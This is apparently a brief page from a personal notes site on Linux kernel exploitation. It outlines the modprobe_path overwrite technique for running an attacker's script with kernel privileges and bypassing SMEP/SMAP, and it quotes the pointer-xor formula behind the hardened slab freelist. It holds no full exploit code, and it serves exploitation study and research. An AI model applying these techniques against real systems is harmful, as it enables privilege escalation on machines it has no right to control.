xct's notes
Search…
Linux Kernel

Overwriting modprobe_path technique

Conditions:
  • Known address of modprobe\_path (unaffected by FG-KASLR)
  • Known address of kpti\_trampoline (unaffected by FG-KASLR)
  • Arbitrary Write
We can write to modprobe_path the path of our own shellscript and then execute a file with unknown signature to trigger it. This technique bypasses SMEP/SMAP.
References:

Bypass CONFIG_SLAB_FREELIST_HARDENED

1
(void *)((unsigned long)ptr ^ s->random ^ ptr_addr);
Copied!
Target pointer is xored with the address of the pointer and a random value. This random value is unique per slab.